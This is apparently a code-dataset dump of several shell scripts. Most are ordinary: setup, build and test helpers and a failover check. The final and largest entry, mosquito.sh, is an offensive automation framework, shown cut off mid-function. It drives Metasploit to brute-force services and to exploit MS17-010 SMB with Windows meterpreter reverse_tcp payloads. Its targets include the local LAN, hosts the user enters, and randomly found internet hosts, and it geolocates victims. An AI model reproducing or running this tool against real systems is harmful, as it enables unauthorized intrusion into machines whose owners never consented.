blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
01a4405d451f4c829b722b12cc0be56138e18ff1
|
Shell
|
terraref/workflow-pilot
|
/workflow_terra/wrappers/bin2tif.sh
|
UTF-8
| 527 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
set -e
set -x
IN_LEFT="$1"
IN_RIGHT="$2"
IN_META="$3"
OUT_LEFT="$4"
OUT_RIGHT="$5"
OUT_META="$6"
TIMESTAMP="$7"
FIXED_META="$8"
# TODO: Deal with this...
# TODO: cp: cannot stat 'ua-mac/Level_1/rgb_geotiff/2018-07-01/2018-07-01__08-35-45-218/rgb_geotiff_L1_ua-mac_2018-07-01__08-35-45-218_left.tif': No such file or directory
OUT_DIR="."
export BETYDB_LOCAL_CACHE_FOLDER=$PWD
export SENSOR_METADATA_CACHE=$PWD/ua-mac/sensor-metadata
./bin2tif.py -l $IN_LEFT -r $IN_RIGHT -m $IN_META -t $TIMESTAMP -o $OUT_DIR
| true |
d57cc6056e39288fef838f3ac52484dd5fc97507
|
Shell
|
MChartier/DevConfig
|
/setup-linux.sh
|
UTF-8
| 1,909 | 3.75 | 4 |
[] |
no_license
|
#!/bin/bash
#
# setup-linux.sh
# Set up new Linux environment.
#
readonly DOTNET_SDK_VERSIONS=(3.1 5.0)
if (( EUID != 0 )); then
echo "This script must be run as root." 1>&2
exit 1
fi
# Upgrade system packages
apt update && apt upgrade
# Install common tools
apt install make
#
# Install 'Oh my Posh'
# https://ohmyposh.dev/docs/installation
#
# Install dependencies
apt install unzip
# Installation
wget https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/posh-linux-amd64 -O /usr/local/bin/oh-my-posh
chmod +x /usr/local/bin/oh-my-posh
# Download the themes
mkdir ~/.poshthemes
wget https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/themes.zip -O ~/.poshthemes/themes.zip
unzip -o ~/.poshthemes/themes.zip -d ~/.poshthemes
chmod u+rw ~/.poshthemes/*.json
rm ~/.poshthemes/themes.zip
# Update bash.rc and reload
echo 'eval "$(oh-my-posh --init --shell bash --config ~/.poshthemes/powerline.omp.json)"' >> ~/.bashrc
. ~/.bashrc
#
# Install emacs
#
add-apt-repository ppa:kelleyk/emacs -y
apt update
apt install emacs -y
cp ./emacs/.emacs ~/.emacs
#
# Configure git
#
cp ./git/.gitconfig ~/.gitconfig
#
# Install dotnet SDKs
#
wget https://packages.microsoft.com/config/ubuntu/20.10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb && apt update
rm ./packages-microsoft-prod.deb
apt install -y apt-transport-https && apt update
for v in ${DOTNET_SDK_VERSIONS[@]}; do
apt install -y dotnet-sdk-$v
done
#
# Install NVM and latest LTS Node.js SDK
# https://github.com/nvm-sh/nvm#install--update-script
#
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
export NVM_DIR="$HOME/.nvm"
# This loads nvm
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
# This loads nvm bash_completion
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
nvm install --lts
| true |
36cb65ef6b4f7f12b1f3550b3a9cf81079420110
|
Shell
|
MindFaktur/bridgelabz-shell
|
/shell_scripts/nov01/practice/first_pdf/harmonic.sh
|
UTF-8
| 148 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash
read -p "enter a number: " num
harNum=0
for ((i=1;i<=$num;i++))
do
harNum=`awk "BEGIN {print $harNum + (1/$i)}"`
done
echo $harNum
| true |
34d5c0fb293b06d3fd1a906b60e3c76f97f7081b
|
Shell
|
eros902002/prebid-mobile-android
|
/testprebid.sh
|
UTF-8
| 1,442 | 2.65625 | 3 |
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
function echoX {
echo -e "PREBID TESTLOG: $@"
}
echoX "start unit tests"
cd PrebidMobile
./gradlew clean test
echoX "assemble debug apk"
./gradlew clean assembleDebug
if [ ! -e DemoApp/build/outputs/apk/debug/DemoApp-debug.apk ];then
echoX "apk creation unsuccessful"
fi
echoX "copy debug apk to destination path"
mkdir -p IntegrationTests/apk && cp DemoApp/build/outputs/apk/debug/DemoApp-debug.apk IntegrationTests/apk/DemoApp.apk
if [ ! -e IntegrationTests/apk/DemoApp.apk ]; then
echoX "file copy unsuccessful"
fi
# Commenting Integration tests out, running it locally only for now since it requires login
# echoX "start integration tests"
# cd IntegrationTests
# bundle install
# npm install -g appcenter-cli
# gem install xamarin-test-cloud
# bundle exec calabash-android resign apk/DemoApp.apk
# bundle exec calabash-android build apk/DemoApp.apk
# #bundle exec test-cloud submit apk/DemoApp.apk 435c130f3f6ff5256d19a790c21dd653 --devices 2ae0b5a0 --series "master" --locale "en_US" --app-name "DemoApp" --user [email protected]
# # bundle exec test-cloud submit apk/DemoApp.apk 435c130f3f6ff5256d19a790c21dd653 --devices b2a05af9 --series "master" --locale "en_US" --app-name "DemoApp" --user [email protected]
# appcenter login
# appcenter test run calabash --app "xtc-AppNexus/DemoApp" --devices "xtc-AppNexus/test-demo-app" --app-path apk/DemoApp.apk --test-series "master" --locale "en_US" --project-dir IntegrationTests/features
| true |
fa9b741a3cd7fefa44b45e01a2bbdc0f329c4f19
|
Shell
|
dia38/walt-python-packages
|
/dev/tools/functions.sh
|
UTF-8
| 134 | 2.859375 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
do_subpackages()
{
for subpackage in $SUBPACKAGES
do
cd $subpackage
$*
cd ..
done
}
| true |
95f8d85021a149a352419ced323ea8cf264b917a
|
Shell
|
opencitymodel/data-pipeline
|
/grid-and-attrs/grid-state.sh
|
UTF-8
| 324 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
SOURCE_DIR=$1
DESTINATION_DIR=$2
GEOCODE_DIR=$3
STATE=$4
# reorg the shapefiles into grids and attach some useful attributes
# --max-old-space-size=8192
node app.js -s ${STATE} -i ${SOURCE_DIR}/${STATE}.txt -o ${DESTINATION_DIR} -c ${GEOCODE_DIR}/county.geo.txt -m ${GEOCODE_DIR}/${STATE}-grid-to-counties.txt
| true |
0d5da7c6f7a7205aca8e67be73c28a7962941d65
|
Shell
|
HMinng/script
|
/Spamd.sh
|
UTF-8
| 218 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash
# @describe:
# @author: Ming He([email protected])
process='cli.php'
num=$(ps -elf | grep $process | grep -v grep | wc -l);
if [ "$num" -eq 0 ]; then
php public/cli.php request_uri="/anticheat/index" &;
fi
| true |
6be8b336e59c7cbea5ee6a32ff6db231a3b28d5b
|
Shell
|
hermeseagel/shellscript
|
/Python_script/shell_ha.sh
|
UTF-8
| 2,356 | 3.015625 | 3 |
[] |
no_license
|
#!/usr/bin/ksh
hbping_primary=8.8.8.8
hbping_gateway=10.1.1.1
check_process='pmon'
hbping_standby=''
vgname=''
mirgation_dirs=[/oracle,/data,]
loggerdirs=''
logfile=''
function testping_p {
#check Primary network status
#if primary can not access also gateway can not access mean standby Network have problem .
#if ping gateway work , ping primary can not access ,maybe Primary got problem
p_status=`ping -c 5 $hbping_primary | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
g_status=`ping -c 5 $hbping_primary | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
if [ $p_status == "Fail" ] && [ $g_stauts == "Fail" ]; then
echo 'Gateway and remote partner can not access '
fi
}
function check_pmon {
ps -ef | grep -i $check_process |grep -v grep | awk '{ print $1,$(NF) }'
}
function removevg_primary {
for dir in mirgation_dirs
do
check_fs=`fuser $dir 2>/dev/null | awk ' {print NF} ' `
if [ $check_fs -eq 0 ]; then
umount $dir
varyoffvg $vgname
exportvg $vgname
elif [ $chek_fs -lt 2 ]; then
fuser -ck $dir
umount $dir
else
echo 'Stop umount'
echo 'please check process all kill'
fi
done
}
function testping_s {
#check standby Server network
#if primary can not access also gateway can not access mean standby Network have problem .
#if ping gateway work , ping primary can not access ,maybe Primary got problem
#s_status standby server network status
#g_status gateway server network status
s_status=`ping -c 5 $1 | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
g_status=`ping -c 5 $2 | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
if [ "$s_status" == "Failed" ] && [ "$g_stauts" == "Failed" ]; then
msg="Gateway and remote partner can not access. Check your setting on this script. or check you local ethernet"
elif [ $s_status == "Pass" ] && [ $g_status == "Failed" ]; then
msg="GateWay can not access , but can access partner."
elif [ $s_status == "Failed" ] && [ $g_status == "Pass" ]; then
msg= "can not accees Partner , but gateway is fine."
fi
return $msg
}
ping_result=$(testping_s $hbping_primary $hbping_gateway)
echo $ping_result
| true |
97bc94663b9cf1ebe822e1a2bff9bf7a0a8abe3c
|
Shell
|
fakeNetflix/uber-repo-peloton
|
/tools/packaging/docker-push.sh
|
UTF-8
| 1,027 | 4.4375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Takes an list of images (built locally) like uber/peloton:foo123, and tags and
# pushes to some registries.
#
# Usage:
# ./docker-push [registry] [image1] [image2]
if [[ $# -lt 2 ]] ; then
echo "No registry and image passed" >&2
exit 1
fi
# first argument is registry
REGISTRY=${1}
[[ $(uname) == Darwin || -n ${JENKINS_HOME} ]] && docker_cmd='docker' || docker_cmd='sudo docker'
# second argument onwards are images
for image in "${@:2}" ; do
echo "Pushing $image to ${REGISTRY}..."
new_image="vendor/peloton"
# pull version from the image, assume latest if not present
ver="${image##*:}"
if [[ "$ver" != "$image" ]] ; then
version="${ver:-latest}"
else
version="latest"
fi
push_target="${REGISTRY}/${new_image}:${version}"
${docker_cmd} tag "${image}" "${push_target}";
if ${docker_cmd} push "${push_target}"; then
echo "The image can now be pulled from docker registry at ${REGISTRY}"
else
echo "Failed to push image to registry"
exit 1
fi
done
| true |
04ece76fc7c8569396d890ea48d996f2ec3e748c
|
Shell
|
mp3splt/mp3splt-web
|
/mp3splt-project/branches/mp3splt-project_0.7.3__2.4.3/tests/mp3_freedb_mode_tests.sh
|
UTF-8
| 3,011 | 3.5625 | 4 |
[] |
no_license
|
#!/bin/bash
. ./utils.sh || exit 1
function _test_freedb_search_get_cgi_tracktype
{
get_type=$1
get_url=$2
get_port=$3
rm -f query.cddb
remove_output_dir
M_FILE="La_Verue__Today"
expected=" Processing file 'songs/La_Verue__Today.mp3' ...
Freedb search type: cddb_cgi , Site: tracktype.org/~cddb/cddb.cgi , Port: 80
Freedb get type: $get_type , Site: $get_url , Port: $get_port
Search string: hacking the future
Searching from tracktype.org/~cddb/cddb.cgi on port 80 using cddb_cgi ...
freedb search processed
Getting file from $get_url on port $get_port using $get_type ...
freedb file downloaded
reading informations from CDDB file query.cddb ...
Artist: Various
Album: Hacking The Future
Tracks: 37
cddb file processed
info: file matches the plugin 'mp3 (libmad)'
info: found Xing or Info header. Switching to frame mode...
info: MPEG 1 Layer 3 - 44100 Hz - Joint Stereo - FRAME MODE - Total time: 4m.05s
info: starting normal split
File \"$OUTPUT_DIR/Various - 01 - The Body Electronic Spews.mp3\" created
File \"$OUTPUT_DIR/Various - 02 - I will tell U 3 things.mp3\" created
File \"$OUTPUT_DIR/Various - 03 - Spew Culture.mp3\" created
Processed 9402 frames - Sync errors: 0
file split (EOF)"
freedb_album_search="hacking the future"
freedb_search="search=cddb_cgi://tracktype.org/~cddb/cddb.cgi:80"
freedb_get="get=$get_type://$get_url:$get_port"
freedb_options="query[$freedb_search,$freedb_get]{$freedb_album_search}(0)"
mp3splt_args="-d $OUTPUT_DIR -q -c \"$freedb_options\" $MP3_FILE"
run_check_output "$mp3splt_args" "$expected"
current_file="$OUTPUT_DIR/Various - 01 - The Body Electronic Spews.mp3"
check_current_mp3_length "00.37"
current_file="$OUTPUT_DIR/Various - 02 - I will tell U 3 things.mp3"
check_current_mp3_length "03.15"
current_file="$OUTPUT_DIR/Various - 03 - Spew Culture.mp3"
check_current_mp3_length "00.12"
print_ok
echo
}
function test_freedb_search_get_cgi_tracktype
{
test_name="freedb mode - search & get cgi tracktype"
_test_freedb_search_get_cgi_tracktype "cddb_cgi" "tracktype.org/~cddb/cddb.cgi" "80"
}
function test_freedb_search_tracktype_get_cgi_freedb
{
test_name="freedb mode - search tracktype & get cgi freedb"
_test_freedb_search_get_cgi_tracktype "cddb_cgi" "freedb.org/~cddb/cddb.cgi" "80"
}
function test_freedb_search_tracktype_get_cddb_protocol_freedb
{
test_name="freedb mode - search tracktype & get cddb protocol freedb"
_test_freedb_search_get_cgi_tracktype "cddb_protocol" "freedb.org" "8880"
}
function run_freedb_mode_tests
{
p_blue " FREEDB tests ..."
echo
freedb_mode_test_functions=$(declare -F | grep " test_freedb" | awk '{ print $3 }')
for test_func in $freedb_mode_test_functions;do
eval $test_func
done
p_blue " FREEDB tests DONE."
echo
}
#main
export LC_ALL="C"
start_date=$(date +%s)
run_freedb_mode_tests
p_failed_tests
end_date=$(date +%s)
p_time_diff_cyan $start_date $end_date "\t"
echo -e '\n'
exit 0
| true |
a222ee63c383540353724279398d3d27c3c8bca2
|
Shell
|
stringlytyped/dotfiles
|
/bashrc
|
UTF-8
| 3,037 | 2.921875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#
# \`.|\..----...-'` `-._.-'_.-'`
# / ' ` , __.--'
# )/' _/ \ `-_, /
# `-'" `"\_ ,_.-;_.-\_ ', fsc/as
# _.-'_./ {_.' ; /
# {_.-``-' {_/
#
# https://github.com/stringlytyped/dotfiles
#
# BASHRC
# Configures non-login interactive shells
#
# Paths
# -------------------------------------------------------------- #
PATH="$HOME/bin:/usr/local/opt/[email protected]/bin:$(go env GOPATH)/bin:$(brew --prefix coreutils)/libexec/gnubin:$(brew --prefix findutils)/libexec/gnubin:$(brew --prefix grep)/libexec/gnubin:$PATH"
MANPATH="$(brew --prefix coreutils)/libexec/gnuman:$(brew --prefix findutils)/libexec/gnuman:$(brew --prefix grep)/libexec/gnuman:$MANPATH"
export PATH MANPATH
# Other exports
# -------------------------------------------------------------- #
export EDITOR='nano'
export LC_CTYPE="utf-8"
export LC_ALL=en_US.UTF-8
export LANG=en_US.UTF-8
# Configure macOS' built-in ls command to print colours
export CLICOLOR=1
export LSCOLORS=GxFxCxDxBxegedabagaced
# Set options
# -------------------------------------------------------------- #
# Prevent files from being accidentally overwritten when using a > redirect
# See http://www.linuxhowtos.org/Tips%20and%20Tricks/Protecting%20files%20with%20noclobber.htm
set -o noclobber
# Enable pyenv shims
# -------------------------------------------------------------- #
# See https://github.com/pyenv/pyenv
if command -v pyenv 1>/dev/null 2>&1; then
eval "$(pyenv init -)"
fi
# Powerline prompt
# -------------------------------------------------------------- #
# See https://github.com/powerline/powerline
powerline_script=~/.pyenv/versions/3.6.5/lib/python3.6/site-packages/powerline/bindings/bash/powerline.sh
if [[ -f "$powerline_script" ]]; then
powerline-daemon -q
POWERLINE_BASH_CONTINUATION=1
POWERLINE_BASH_SELECT=1
# shellcheck source=/Users/JS/.pyenv/versions/3.6.5/lib/python3.6/site-packages/powerline/bindings/bash/powerline.sh
source "$powerline_script"
fi
# Aliases
# -------------------------------------------------------------- #
alias ls='ls --color=auto -F'
# F: add classifiers to end of entries
alias ll='ls --color=auto -lFh'
# l: use long-listing format
# F: add classifiers to end of entries
# h: print file sizes in human-readable form
alias git='hub'
# https://hub.github.com/
alias weather='weather --units ca'
# https://github.com/genuinetools/weather
alias grep='grep --color=auto'
alias mkdir='mkdir -pv'
alias edit='open -a "Visual Studio Code"'
alias reload='bind -f ~/.inputrc; source ~/.bash_profile'
alias server='python3 -m http.server'
alias pgstart='pg_ctl -D /usr/local/var/postgres start'
alias pgstop='pg_ctl -D /usr/local/var/postgres stop'
alias cd..='cd ..'
alias cd~='cd ~'
alias ..='cd ..'
alias ...='cd ../../'
alias ....='cd ../../../'
alias .....='cd ../../../../'
alias ......='cd ../../../../../'
alias ..1='cd ..'
alias ..2='cd ../../'
alias ..3='cd ../../../'
alias ..4='cd ../../../../'
alias ..5='cd ../../../../../'
alias ~='cd ~'
| true |
a7232b70fdf932ac18c5e0f747f8c9e30aac0729
|
Shell
|
NTgitdude23/resource_files
|
/mosquito.sh
|
UTF-8
| 44,856 | 3.484375 | 3 |
[] |
no_license
|
#!/bin/sh
# Author: r00t-3xp10it
# mosquito framework v:3.10.3 [STABLE]
# Automate remote brute force tasks over WAN/LAN networks
# GitHub: https://github.com/r00t-3xp10it/resource_files
# Suspicious Shell Activity - redteam @2019
##
resize -s 38 120 > /dev/nul
# variable declarations _______________________________________
# |
OS=`uname` # grab OS
ver="3.12.3" # mosquito version
SaIU=`arch` # grab arch in use
IPATH=`pwd` # grab mosquito path
htn=$(hostname) # grab hostname
DiStRo=`awk '{print $1}' /etc/issue` # grab distribution - Ubuntu or Kali
user=`who | awk {'print $1'}` # grab username
EnV=`hostnamectl | grep Chassis | awk {'print $2'}` # grab environement
InT3R=`netstat -r | grep "default" | awk {'print $8'}` # grab interface in use
RANGE=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'} | cut -d '.' -f1,2,3` # ip-range parsing
# ____________________________________________________________|
# sellect attacker arch in use
if [ "$SaIU" = "i686" ] || [ "$SaIU" = "x86" ]; then
ArCh="x86"
else
ArCh="x64"
fi
## Colorise shell Script outputs
Colors() {
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
}
Colors;
## Make sure we are in 'resource_files' working directory
if ! [ -e "logs" ]; then
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ""${Reset};
cat << !
Before we are abble to install/execute mosquito, we need to download
🦟mosquito working directory to our machine first and then run it.
!
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} sudo git clone https://github.com/r00t-3xp10it/resource_files.git"
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} cd resource_files && sudo chmod +x -R *.sh"
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} sudo ./mosquito.sh -h"
echo "" && echo "---"
sleep 1
exit
fi
## Arguments menu
time=$(date | awk {'print $4'})
while getopts ":h,:u,:i," opt; do
case $opt in
u)
cd aux && ./install.sh -u # update (install.sh -u)
exit
;;
i)
cd aux && ./install.sh # install dependencies (install.sh)
exit
;;
h)
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ""${Reset};
echo "${BlueF} ${RedF}:${BlueF}Framework Description_"${Reset};
cat << !
Mosquito uses metasploit auxiliary modules + nmap nse + resource files
to be abble to automate remote brute force tasks over WAN/LAN networks.
'scan Local Lan, scan user inputs (rhosts),Search WAN for random hosts'
!
echo "${BlueF} ${RedF}:${BlueF}Framework Info_"${Reset};
cat << !
Author: r00t-3xp10it
Suspicious Shell Activity🦟redteam @2019🦟
https://github.com/r00t-3xp10it/resource_files
!
echo "${BlueF} ${RedF}:${BlueF}Dependencies_"${Reset};
cat << !
zenity|metasploit|nmap|dig|geoiplookup|http-winrm.nse
curl|freevulnsearch.nse|multi_services_wordlist.txt
!
echo "${BlueF} ${RedF}:${BlueF}Limitations_"${Reset};
cat << !
a) mosquito accepts only ip addr inputs,not domain names
b) brute force takes time, use 'CTRL+C' to abort scan(s)
c) mosquito dicionarys can be found under \bin\wordlists
d) finding valid creds sometimes fails to spanw a shell
e) having multiple sessions open migth slowdown your pc
!
echo "${BlueF} ${RedF}:${BlueF}Install/Update_"${Reset};
cat << !
cd resource_files
find ./ -name "*.sh" -exec chmod +x {} \;
update - sudo ./mosquito.sh -u
install - sudo ./mosquito.sh -i
!
echo "${BlueF} ${RedF}:${BlueF}Execution_"${Reset};
cat << !
sudo ./mosquito.sh
!
echo "---"
exit
;;
\?)
echo "${RedF}[x] Invalid option: -${white}$OPTARG"${Reset}; >&2
exit
;;
esac
done
## Make sure we have installed mosquito
if ! [ -f "aux/install.log" ]; then
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ __(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ${white}"---${YellowF} 'Mosquito reports that its ${RedF}not${YellowF} installed'."${Reset};
echo ""
echo -n "${BlueF}[${YellowF}i${BlueF}] Do you wish to install 🦟mosquito dependencies now? (y/n):"${Reset};read quer
if [ "$quer" = "y" ] || [ "$quer" = "Y" ]; then
cd aux && ./install.sh # install dependencies (install.sh)
fi
fi
###################################################################
# * 🦟 FRAMEWORK MAIN FUNCTIONS 🦟 * #
###################################################################
service postgresql start | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Starting postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
#
# geo_location funcion
#
sh_one () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} geo_location resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" TRUE "Scan user inputs (rhosts)" FALSE "Scan user input host list (file.txt)" FALSE "Internal ip addr to external ip Resolver" --width 330 --height 200) > /dev/null 2>&1
#
## Sellect the type of scan to use
#
if [ "$scan" = "Scan user inputs (rhosts)" ]; then
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 162.246.22.133 104.96.180.140" --width 450) > /dev/null 2>&1
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg RHOSTS $rhost;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg RHOSTS $rhost;resource geo_location.rc;workspace -d mosquito"
fi
#
# Scan user input host list (file.txt)
#
elif [ "$scan" = "Scan user input host list (file.txt)" ]; then
echo "${BlueF}[☠]${white} Scanning User input host list (file.txt)"${Reset};
list=$(zenity --title "🦟 MOSQUITO 🦟" --filename=$IPATH --file-selection --text "chose host list to use") > /dev/null 2>&1
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg TXT_IMPORT $list;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg TXT_IMPORT $list;resource geo_location.rc;workspace -d mosquito"
fi
#
# Internal ip addr to external ip Resolver (dig)
#
elif [ "$scan" = "Internal ip addr to external ip Resolver" ]; then
echo "${BlueF}[☠]${white} Resolving Internal ip addr to external ip"${Reset};
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg RESOLVER true;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg RESOLVER true;resource geo_location.rc;workspace -d mosquito"
fi
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force most common services
#
sh_two () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} brute_force resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource brute_force.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 216.15.177.33 162.246.22.133" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource brute_force.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for targets"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource brute_force.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force ms17_010 (smb) service(s)
#
sh_tree () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ms17_010 resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
payload=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "\nSellect exploitation Payload:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_tcp" --width 353 --height 195) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 46.147.255.230 194.58.118.182" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
else
